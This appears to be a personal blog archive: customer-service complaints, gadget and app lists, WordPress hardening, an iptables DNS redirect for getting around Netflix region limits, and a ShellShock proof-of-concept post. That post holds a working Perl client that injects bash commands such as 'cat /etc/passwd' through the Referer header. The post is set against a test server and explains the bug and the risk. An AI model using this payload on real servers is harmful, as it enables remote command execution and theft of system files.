Thursday, 27 August 2015

Moving to Three (3) mobile - why not - assuming you enjoy pain...

1 day of Three and they suck...

Wed 26th August 2015

Bought 2 PAYG SIMs from 3's shop in the Victoria shopping centre, Tunbridge Wells for the kids as the "123" 3p/minute, 2p/text, 1p/MB tariff looked attractive.

This is mostly for emergency use with the deal being I put £5 on a month and the kids pay for extra if they want to yabber with friends. To this end I value a simple "no bundle" tariff that they (and me!) can understand the true value of each minute, text and MB of data.

Thu 27th August 2015

9am - action time! Put one SIM in my son's unlocked mobile. Powered up and "bang": received a text message saying "...we're doing some essential maintenance work" and to try again later.

This went on until after after 2pm. Restart the phone, and each time I get a fresh identical text message.

During this 9am-2pm period, the entire of 3's billing website was down with this:

It's not just me - Twitter is alive with the same complaint all over the UK.

15:22 of the same day

Received a different text. This one said:

So I went back to the same shop in Tunbridge Wells.

Showed the chap in the shop the problem - and by now I really was not happy. I should add, my displeasure was obvious, but I never shout or swear at shop staff. But I cannot promise to be fawning and happy when I've just been messed about all morning. 

Did I get an apology? Nope. He said "everyone thinks it's my fault it's broken. It's not." No apologies. 

So off he goes to talk to his colleague. Comes back and says "You'll have to call customer services".

I replied: "Can you give me a new SIM - it says this one is broken and to come in here?"

After another word with his colleague, he said "Yes, you can buy a new SIM for £1 and claim a refund on the other one". "But we cannot just give you a SIM".

At this point I left in a major huff. Talk about failing on every single point of customer service, all for £1's worth of SIM. As for me, I am fuming and this will not rest.

Back home, 17:13.

Have been on the phone to 333 (Customer Services) for 19 minutes.

Every menu option takes you to another automated message. The only way I found to speak to a human was to select sales.

That person was at least apologetic and said the entire billing system was broken most of the day. But he still had to transfer me to customer services.



Finally - customer services... Let the games commence!


After giving details of the broken SIM, the chap confirms it and asks if I'd like a new SIM.

"No thank you" I said, I want my £1 back.

"I'm sorry", he said, "you need to go to the shop for that".

"I've just been to the shop and they said they could not replace the SIM and they did not offer a refund. They said I had to call customer services. So I am not prepared to be a ping pong ball any longer..."

Once he realised I was serious, he offered to credit the £1 back to another number with Three. As it happened the other SIM I bought worked so I asked for the credit to be put there.


Still on with the customer services bloke. Now raising a complaint about the appalling (lack of) service in the Tunbridge Wells shop.

18:00 ish

Finally all done. £1 will be credited back to the other SIM. Complaint about appalling service at shop is registered.


I left Three 1 1/2 years ago as their network, that used to be pretty good, was degrading in the places I needed. The signal was fine, but data was very slow - it felt like the data channels had too much contention.

Having been with EE since, I thought it might be reasonable to see if 3 had improved their network. It's hard to say as I've only just got on it. However, if they have serious unplanned system outages for several hours into the working day, and if the attitude of their shop staff are anything to go by, I am certain, that as soon as my top up voucher on the remaining SIM runs out, I will never touch their network ever again.


Well, managed to apply the top up vouchers to the remaining SIM. And yet the Three App breaks ("My3 currently unavailable") and the web page gives this:

Tuesday, 20 January 2015

Rail bosses hit back at 6-year-old girl's cute letter

"Little Ella Porter, from Uckfield, penned the note to bosses at the rail company, pleading with them to help dad Neil arrive home in time to tuck her into bed.
She wrote: "Dear Mr Railway Man, my daddy is always late home and I miss him very much because he always used to tuck me into bed, this makes me upset."

Southern could have done so much more here.

Maybe a couple of cab passes so she and dad could ride up front in a train to see what problems it faces into London.

At the very least a hand written letter from the MD back to the young lady would have been courteous. They might even have set her on the path of being a train driver when she grows up (and yes, women DO drive trains!).

But no - faceless customer service brush off. They spend millions on PR and yet they miss a golden opportunity...

Friday, 26 September 2014

ShellShock GNU bash vulnerability

Here's a proof of concept of the ShellShock attack on Debian 6


Create 2 CGI scripts thus:


echo Content-type: text/plain
echo ""
echo Hello


print "Content-type: text/plain\n";
print "\n";
print "Hello from perl\n";
#system('/bin/bash -c "echo Im In Bash"');

use strict;
use warnings;
use LWP;
my $hackstr = '() { :; }; echo \'Content-type: text/plain\'; echo \'\'; echo \'Youve been 0wn3d\'; ';

my $targeturl = '';
my $ua = LWP::UserAgent->new;
$ua->agent('MyHack 1.0');
my $req = HTTP::Request->new(GET => $targeturl);
$req->header('Referer', $hackstr);
my $res = $ua->request($req);
if ($res->is_success) {
        print $res->content;
else {
        print $res->status_line, "\n";



Install test1.cgi and test2.cgi on a test webserver under /cgi-bin/ and make sure both are chmod +x

Edit the $targeturl variable in to point to your test server and set it to test1.cgi

Run The output might look something like:

Youve been 0wn3d
Content-type: text/plain


Now change $targeturl in to end in "/test2.cgi"
Run again. The output might look like:

Hello from perl
HTTP_REFERER=() { :; }; echo 'Content-type: text/plain'; echo ''; echo 'Youve been 0wn3d';

So good - non bash CGI scripts do not do anything bad.
EXCEPT, and here's the rub, what if the script calls bash via an exec() or system()?
Well - uncomment the #system... line in test2.cgi and run testclient again:

Hello from perl
HTTP_REFERER=() { :; }; echo 'Content-type: text/plain'; echo ''; echo 'Youve been 0wn3d';

Content-type: text/plain

Youve been 0wn3d
Im In Bash

Oh dear...

Here's an improved
use strict;
use warnings;

use LWP;
my $cmd = $ARGV[0];
my $hackstr = '() { :; }; echo \'Content-type: text/plain\'; echo \'\'; echo \'Youve been 0wn3d\'; ' . $cmd;

my $targeturl = '';
my $ua = LWP::UserAgent->new;
$ua->agent('MyHack 1.0');

my $req = HTTP::Request->new(GET => $targeturl);
$req->header('Referer', $hackstr);
my $res = $ua->request($req);
if ($res->is_success) {
        print $res->content;
else {
        print $res->status_line, "\n";

Now you can run: 'hostname -f'

and get something like:
Hello from perl
HTTP_REFERER=() { :; }; echo 'Content-type: text/plain'; echo ''; echo 'Youve been 0wn3d'; hostname -f

Content-type: text/plain

Youve been 0wn3d

then try: 'cat /etc/passwd'

So what does it all mean?

Well - you'll notice I had to explicitly call /bin/bash in test2.cgi and also make it the explicit interpreter in test1.cgi.

This is because in Debian 6 and 7 at least apache's default shell is /bin/sh which is a symlink to /bin/dash. Debian 5 and before used bash as the default shell. NOTE that if you did an inplace dist-upgrade of Debian 5 to 6, /bin/sh will still link to /bin/bash.

So your risk (at least on new installs of Debian 6 onwards) will be limited to any web script that is called directly or indirectly from a CGI mechanism AND invokes bash explicitly - unless you changed the system shell...

Trivial clean test script for testing systems

use strict;

use warnings;
$ENV{SHELLSHOCK} = '() { :; }; echo \'Vulnerable to shellshock\'';

exec('/bin/bash', '-c', 'exit');

Monday, 9 June 2014

Media Players: Roku and Chromecast and unblock-us problems.

I just bought a Roku 3 and a Google Chromecast stick.

The Roku 3 is a set top box that plugs into your TV's HDMI port and sits on your network. Using a remote control, you can watch various streaming media services such as Netflix, BBC iPlayer and Youtube (and many many more).

The Chromecast stick is slightly different in that it works together with a smartphone or laptop and allows you to "cast" Netflix, Youtube and certain other enabled apps onto your TV.

Now, many people use unblock-us or a similar service to allow us to get access to Netflix's US catalogue rather than the pathetically limited UK catalogue.

unblock-us relies on you being able to chose their DNS servers for your media device so it can route requests for Netflix's catalogue via America and "fool" Netflix into thing you are in the States.

Let me clear - Netflix don't mind. You still pay them. The people who want to enforce this ridiculous state of affairs are the film studios who are stuck in the Pleistocene era of regional distribution.

Regions made sense back in the day when films were sent out on reels. A rell of positive film costs an arm and a leg to print and even the likes of Universal can only afford to make so many tens of thousands. So they were sent first to US cinemas. After they were done, the same reels were sent to the UK and other Region 2 countries. Then onto Region 3 countries and so on.

We're living in a digital age now - even cinemas are digital. Copies of media are very cheap (network bandwidth). So it really is an antiquated notion.

Now probably in an effort to placate the content providers, Roku or Netflix (it's a little unclear) and Chromecast (which is a Google device)  have chosen to hard code Google's public DNS servers ( and into their devices rather than respecting what my network's DHCP server tells it.

Precisely, Roku/Netflix use my DNS with as the secondary.

One option is to block and at your router (with either a firewall or static route that goes nowhere). I don't like this - and can see it causing problems as the device stutters and waits of a DNS server that will never reply.

Here's a solution for linux enthusiasts, which actually spoofs Google's IPs - so the Roku or Chromecast stick thinks it's talking to Google's DNS but it's actually being bounced to unblock-us's.

You do not need a linux router - but you do need a linux PC on the same LAN (subnet) as your Roku/Chromecast/etc that's always on (at least when you are watching stuff).

Setup (change your IPs to suit)

My Linux server is
My client IP (that I wish to spoof Google for) is
I will be using unblock-us's DNS server

Step 1 - Ensure can handle IP forwarding:
# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2 - Tell your DHCP server to serve as the gateway/default route to the Roku/Chromecast

Step 3 - On, load these netfilter rules:

iptables -t nat -N spoof_google_dns
iptables -t nat -A spoof_google_dns -d -p udp --dport 53 -j CONNMARK --set-xmark 0x2/0x2
iptables -t nat -A spoof_google_dns -d -p udp --dport 53 -j CONNMARK --set-xmark 0x2/0x2
iptables -t nat -A spoof_google_dns -m connmark --mark 0x2/0x2 -j DNAT --to-destination
iptables -t nat -A POSTROUTING -m connmark --mark 0x2/0x2 -j SNAT --to-source
iptables -t nat -A PREROUTING -s -j spoof_google_dns

Add as many copies of the LAST LINE as you need, changing to your Roku/Chromecast client IPs

If you just want to cover the whole network (eg because you don't use static IPs), replace the last line with

iptables -t nat -A PREROUTING -j spoof_google_dns

Add your laptop IP to the rules temporarily and test with

dig @

to test before and after loading the rules. The difference should be obvious.

I like this solution because:

1) It does not "break" the Google IP - it actually spoofs it;

2) It's reasonably clean as far as horrid hacks go;

3) It *only* affects DNS queries to and for specific clients so it does not bend your whole network out of shape.

4) It does not require full scale network restructuring;

5) You could probably pull the same stunt with *BSD or Windows but I have not idea how!

Sunday, 12 January 2014

Squiddy's Recommended - Gadgets and tools

Stuff I personally own or have tested in depth which I've found exceptional.

(I'm neither paid by nor affiliated with any of these companies - just an ordinary user)

Power Bank USB Charger

RAVPower RP-PB07 Power Bank (10.4Ah 1A/2A USB Outputs)

An extremely useful piece of kit if you have a power hungry smartphone and you are away from the mains for the day. Such scenarios might include heavy use of GPS maps when out walking in the countryside.

This device is surprisingly cheap at around £24 for what it is - an external power pack with twin USB outputs and 10.4Ah capacity (enough to charge most smartphones 2-3 times and even recharge a *Pad).

More importantly when the device can actually deliver the goods. The 2A output took my Samsung Galaxy Note 3 from 42% to 75% in the 90 odd minutes I was on the train yesterday, whilst I was tethering my laptop through the phone and occasionally poking the phone. If you know Samsungs, you'll know that's quite an achievement as they are notoriously power hungry.

This unit is not light - but it's not something you'd notice stuck in a backpack as a backup, or in your coat pocket if out and about.

It's not limited to phones - it should charge anything that charges via USB - your milage may vary.

To charge the unit, use any reasonably powerful charger with a micro-USB (not micro-USB3) plug. Your phone's own charger may serve. Recharge times are approximately overnight.

Food chopping board

TopGourmet Cutting Board

This is a very personal subject and I suspect many of you won't agree with my views - but that's fine.

I'm fussy about chopping boards. I hate glass as they knacker my knives and I don't like them from a tactile point of view. Not keen on plastic - they score too deeply which means hygiene is questionable. I love wood - just right tactile wise - BUT you can't dishwash them which I prefer to do after prepping meat or fish. Well, you can, but they fall to bits in a few months...

The board pictured is actually pretty good. Not as soft as wood, but harder than plastic (doesn't score deeply) and a lot kinder to blades than glass boards. Best bit is, it is fully dishwasher safe - I've had mine for about a year and it is still good. It's the right compromise for my tastes.

It's basically resin bonded paper as far as I can tell. Here's some background.

Fridge/Freezer thermometer

Simple you'd think? What about if you want one with Min/Max readings (to check whether that last long power cut has put your freezer contents in jeapody? How about one that's easy to read from one place at eye level and maybe has an alarm?

There are plenty of fridge/freezer thermometers available. However I've never been very impressed with any of them.

This one is definitely well built compared to a lot of the standard offerings and being wireless, there are no wires with sensors to get caught up with the drawers in the freezer.

Not really an essential item, but as my village is prone to random power cuts several times a year, some of which last for 6 hours or more, I value knowing how warm the fridge and freezer got. And the wireless sensors are handy when your fridge and freezer are not adjacent and allow the sensors to be placed at the back where opening the appliance for short times won't cause the sensor to warm up unreasonably quickly.

Word to the wise - put lithium AAs into the freezer sensor - alkalines are not happy at -22C. Normal alkalines are fine in the fridge sensor and display unit though.

Thursday, 11 April 2013

Securing Wordpress - hardening the webserver

There are three main classes of attack against Wordpress:

  1. Obtaining access to a legitimate Wordpress user account. 
  2. By finding a vulnerability in the Wordpress codebase, including and plugins or themes your users may have loaded.
  3. Comment SPAM.
All of the above lead to the possibility of inserting SPAM links into your blog. 3 is easiest to deal with by comment moderation or installing antispam measures such as Akismet.

If Admin access is obtained in 1 above or via the second attack class, arbitrary PHP could be uploaded (directly or as plugins or themes) allowing effectively arbitrary code execution on the server as the webserver user. This of course may lead to root exploits against the underlying OS. Some danger also exists in allowing Wordpress admins to upload arbitrary unchecked themes and plugins - there are a huge number out there that contain malicious code.

I personally have been bitten by 2 (attacker uploaded phpshell then took over several blogs and used them to distribute a virus via a Windows Internet Explorer attack.

It seemed to me that the first and most general line of defence was to prevent the webserver being able to execute any uploaded files at all, except when the server admin says so.

The first thing is to tell the webserver, Apache 2.2 in my case, to not allow code execution in these directories. these are directories where the webserver and WP need to be able to write files. We only need to worry about paths that the webserver can subsequently serve (and potentially run an interpreter against).
  1. <BLOGBASE>/wp-content/uploads/
  2. <BLOGBASE>/wp-content/plugins/mm-forms/exports/
  3. <BLOGBASE>/wp-content/plugins/mm-forms/captcha/tmp/
1 should be common to all WP installs. 2&3 depend on the plugins running. There of course may be more if you are running different plugins to me.

For each directory above, add this to the apache conf.d/ directory for each path you need to protect (or ensure it is active for each WP site):

<DirectoryMatch /wp-content/uploads/ >
    php_flag engine off
    Options -ExecCGI
    AllowOverride None

That may not be the complete solution - I'm checking other options - comments welcome!

Now make the entire WP tree read only to the webserver user (www-data in the case of Debian) and owned by root. Allow the webserver group (also www-data for Debian) write access to the paths above. The owner of these paths will still remain root.

Here's what one of my WP installs looks like to 2 levels deep:

root:root drwxr-xr-x .
root:root drwxr-xr-x ./wp-admin
root:root drwxr-xr-x ./wp-admin/css
root:www-data drwxrwxr-x ./wp-content/uploads
root:root drwxr-xr-x ./wp-content/themes-ai1ec
root:root drwxr-xr-x ./wp-includes/SimplePie

You get the idea...

Now if we need to unlock the blog to allow updates or adding plugins or themes, all we have to do is:

chown -R www-data <WP-path>

and to lock:

chown -R root <WP-path>

Just to be a little safer I run a few extra bits - which are enough to lock a default install down:

chown -R root <WP-base>/
chgrp -R root <WP-base>/
chmod -R o=rX <WP-base>/
chgrp -R www-data <WP-base>/wp-content/uploads/
chmod -R g=rwX <WP-base>/wp-content/uploads/
# and any other paths that need to be webserver writable.

chown -R www-data <WP-base>/
chmod -R u=rwX <WP-base>/

For your convenience, my scripts are available here:

Sunday, 10 February 2013

Android - Squiddy's best apps list

  • Now that Google Reader is having the plug pulled, I've switched to Taptu which is a nice RSS client - allows streams to be merged and has a pretty nice layout.
  • Email - K9 Mail The best I have tried, ever. Multiple accounts, reliable, good notification control, hide lesser used IMAP folders. Free.
  • Launcher - used to be a fan of Go Launcher Ex, which is very customisable and very active. Just switched to Nova Launcher Prime which is smooth, a little lighter and has an excellent App Drawer folder mode avoiding the need for external app sorters. £2.50
  • Car GPS - used to use Sygic, now switched to CoPilot Live which seems snappier. Sygic's paid for traffic addon was becoming unreliable and next to useless. I'm checking to see how CoPilot fares.
  • Walking GPS (UK) - Viewranger. Cannot find anything to beat it that has offline OS 1:25000 maps, purchasable by the tile. Utterly brilliant is the way you can edit a track on a PC or the phone, then share it and follow it in GPS mode. Makes night hikes simple...
  • Real Time GPS Tracker - does what it says. Hide the phone in your kid's bag and send them to the shops (first time out by themselves), knowing you can see where they are on any web enabled device... Could be useful for group outings where the group may want to split up for an hour or two...
  • Ocado shopping app. Assumes you want to buy Waitrose fare, but has an excellent offline mode with full catalogue. Not seen anything as good from the other supermarkets.
  • Mapping cellular signal coverage: Sensorly for reasons explained here.
  • editing: Google's own Blogger app. Does everything I want, so not really looked at the alternatives.
  • Wordpress updates: Wordpress app. Works pretty well unless you get custom with the HTML, then it can lose the plot a bit.